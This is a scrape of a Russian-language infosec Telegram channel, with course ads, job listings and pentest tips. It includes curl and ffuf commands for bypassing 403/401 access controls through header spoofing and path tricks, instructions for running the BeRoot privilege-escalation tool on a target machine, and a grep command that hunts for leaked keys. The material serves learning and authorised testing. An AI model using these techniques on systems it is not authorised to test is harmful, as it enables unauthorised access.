Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.87K photos
97 videos
166 files
2.9K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.iss.one/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
☝️ Последний шанс купить курсы Proglib Academy с доступом навсегда!

Это не просто летняя распродажа, это финал эпохи. Мы дарим скидку 40% на все курсы, включая полностью обновлённый курс по Python (предложение НЕ ДЕЙСТВУЕТ только на курс по AI-агентам для DS-специалистов).

Но главное: с 1 августа доступ ко всем новым курсам станет ограниченным. Успейте инвестировать в свои знания на самых выгодных условиях!

👉 Выбрать курс
🔥3
🤑 Топ-вакансий для хакеров за неделю

Руководитель проектов ИБ — офис (Москва)

Аналитик по информационной безопасности — удаленно (Санкт-Петербург)

Специалист по архитектуре ИБ — удаленно (Нижний Новгород)

Руководитель проектов по ИБ — офис (Москва)

Эксперт по информационной безопасности — даленно (Москва)

➡️ Еще больше топовых вакансий — в нашем канале InfoSec jobs

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
Как анализировать 403/401 страницы через bypass-техники

Иногда 403 Forbidden или 401 Unauthorized — это не приговор, а вызов. Эти коды часто скрывают админки, API и чувствительные ресурсы. Вот как их обходят:

1. Смена HTTP-методов


curl -X POST https://target.com/secret
curl -X HEAD https://target.com/admin


📍 Некоторые бэкенды не проверяют права на POST или HEAD.

📍 Полезно для старых API и нестандартных фреймворков.

2. Добавление обходных заголовков


curl -H "X-Original-URL: /admin" https://target.com
curl -H "X-Custom-IP-Authorization: 127.0.0.1" https://target.com/secret


📍 Часто срабатывает, если WAF/бэкенд доверяет заголовкам от прокси.

📍 Работает на старых nginx/apache или при кривых кастомных middleware.

3. Мутации путей и суффиксы


curl https://target.com/admin/
curl https://target.com/admin//
curl https://target.com/admin%2f
curl https://target.com/admin..;/


📍 Классика: двойные слеши, URL-энкодинг, суффиксы типа ;, %2e.

📍 Бывает, что /admin/ даёт 403, а /admin// — 200 OK.

4. Удаление или подмена cookies


curl -b "auth=invalid" https://target.com/panel
curl --cookie-jar /dev/null https://target.com/secure


📍 Иногда доступ ограничен только при наличии определённых cookies.

📍Удаление может обойти ограничения.

5. Подмена User-Agent и IP


curl -H "User-Agent: Googlebot" https://target.com
curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/hidden


📍 Много админок открыты для Googlebot, Baiduspider, Yandex.

📍 X-Forwarded-For — один из старейших багов доверия IP.

6. Автоматизация фаззинга


ffuf -w bypass.txt -u https://target.com/FUZZ -mc 200,401,403


📍 Используй словари обхода путей (bypass.txt, raft-large-directories.txt).

📍 Можно тестировать на wildcard-доменах, например admin.target.com.

💡 Лайфхаки:

— Работает особенно хорошо на CDN, старом nginx/apache, poorly configured WAF.

— Комбинируй обход с фаззингом через ffuf, dirsearch, qsreplace.

— Проверяй логику: 403 ≠ реально закрыто. Иногда это просто заглушка от WAF.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
📌 Как поднять резюме в топ на HeadHunter

Вы прокачаны в пентесте, разбираетесь в уязвимостях, но просмотров на HH — ноль? Все просто — ваше резюме видит не человек, а алгоритм. И его нужно обмануть.

Что в карточках:

➡️ Почему использование популярного города, типа «Москва», — это не ложь, а стратегия

➡️ Когда и как вручную улучшить видимость резюме

➡️ Какие навыки в области безопасности стоит подтверждать на HH

➡️ Как правильно подобрать ключевые слова для поисковой выдачи

➡️ Почему видеовизитка для пентестера — это не только тренд, но и шанс на собеседование

Чтобы получать приглашения на собесы, начните с видимости. Алгоритм не прощает бездействия.

🔗 Полный текст статьи — по ссылке

🐸 Библиотека хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👍1😁1
🌸 Инструмент недели: проверка привилегий в Windows и Linux

BeRoot — это легковесный инструмент для поиска путей эскалации привилегий на постэксплуатационном этапе. Особенно полезен, когда у вас уже есть доступ к машине, но нужны админские права.

Зачем нужен:

Ищет типовые ошибки в конфигурации, которые могут привести к повышению привилегий.

Поддерживает локальный анализ без загрузки дополнительных модулей — подходит для скрытной работы.

Покрывает десятки техник: небезопасные пути, уязвимости в службах, слабые права на файлы, SUID-бинарники и др.

Как использовать:

1. Установка:


git clone https://github.com/AlessandroZ/BeRoot.git


2. Для Windows:

➡️ Скопируйте BeRoot.exe на целевую машину и запустите:


BeRoot.exe


3. Для Linux:


cd BeRoot/Linux
python beroot.py


➡️ Можно указать конкретный плагин:


python beroot.py -p suid


Как использовать по максимуму:

— Запускайте с разных учёток, чтобы выявить уязвимости, доступные только определённым пользователям.

— Используйте в связке с LinPEAS / WinPEAS — сначала BeRoot (быстро), потом более глубокий анализ.

— Анализируйте вывод на наличие: AlwaysInstallElevated, SUID-бинарников, writeable PATH, hijackable services и пр.

⚠️ BeRoot не эксплуатирует уязвимости, а только находит потенциальные точки входа — вы должны использовать полученные данные вручную или с помощью эксплойтов (например, из Metasploit или PowerUp).

🔗 Официальный репозиторий

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥1👾1
🎧 Свежий выпуск подкаста от Касперского

Авторы обсуждают, как культура киберпанка повлияла на образ хакера, где заканчивается фантастика и начинается практика, и почему российский хакер — это отдельный феномен.

В выпуске:

➡️ Как литература и кино сформировали романтичный образ хакера

➡️ Реальные истории атак в России

➡️ Немного этики, технологий и тёмной эстетики

🔗 Слушать выпуск

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👾4😁1
😶 Ваш топ бесполезных тулов

В арсенале хакера и пентестера десятки инструментов: от классики вроде Metasploit до авторских фреймворков и кастомных скриптов. Но не все одинаково полезны — особенно в реалиях боевых задач.

Вопрос от подписчика:

«Metasploit — классика, без него ни один курс не обходится. Но по факту почти всё, что там есть, палится на раз. Сигнатуры везде, модули старые. Из тридцати штук реально сработал один. Почему его до сих пор учат как “основу offensive”? Это ж чисто для демо, не для реальных задач.»


Какой инструмент вы считаете переоценённым или устаревшим?

Пишите в комментах, особенно если был painful опыт 👇

P.S. Если хотите задать вопрос, заполните нашу гугл-форму. Это займет 5 минут.

🐸 Библиотека хакера

#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🤔1
📌 Команда дня: поиск утекших ключей и токенов в файлах

Проверьте проект или файловую систему на наличие чувствительных данных:


grep -rEi '(api[_-]?key|secret|token)[=:]?' . 2>/dev/null


-r — рекурсивный поиск по всем вложенным каталогам.

-E — включает поддержку регулярных выражений.

(api[_-]?key|secret|token) — шаблон, находящий распространённые названия секретов.

2>/dev/null — скрывает ошибки доступа к системным файлам.

Используется для:

➡️ Поиска утёкших API-ключей и токенов в коде, логах или конфиг-файлах.

➡️ Аудита проекта перед публикацией или загрузкой в GitHub.

➡️ Обнаружения уязвимостей в чужом исходном коде на ревью или пентесте.

💡 Советы:

— Добавьте --color=always для подсветки совпадений.

— Можно сузить область поиска:

grep -rEi ... ./config ./secrets ./logs


— Расширьте шаблон под свои нужды: (aws_secret|slack_token|bearer|auth).

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4👾1
🤖 Знаете, чем настоящий AI отличается от чат-бота?

Чат-бот просит перезагрузить роутер, а настоящий AI уже умеет читать ваши эмоции в чате, включать музыку под ваше настроение, контролировать погрузку руды с точностью Терминатора и даже находить на КТ-снимках то, чего не заметит человеческий глаз.

Современные компании для таких задач всё чаще используют Deep Learning — алгоритмы на основе нейросетей. Но чтобы попасть в эту лигу, нужен фундамент. И имя ему — Machine Learning.

Наш новый курс по ML — это не волшебная таблетка. Это честный и структурированный путь в мир Data Science. Мы дадим вам базу, с которой вы:

разберётесь, как мыслят машины (спойлер: матрицами!);

научитесь строить работающие модели, а не карточные домики;

получите трамплин для прыжка в Deep Learning.

Хватит смотреть, как другие запускают ракеты. Пора строить свой собственный космодром.

Начните с фундамента на нашем курсе по Machine Learning!
😏 Хет-трик пентестера: обзор и опыт получения трех ИБ-сертификатов

Сертификаты стали важным этапом для пентестеров, открывая двери в мир Red Team и ИБ-профессий.

В карточках собраны основные шаги и ключевые навыки, которые помогут вам успешно подготовиться к сертификациям CRTP, CRTE и CRTO.

🔗 Полный текст статьи — по ссылке

🐸 Библиотека хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM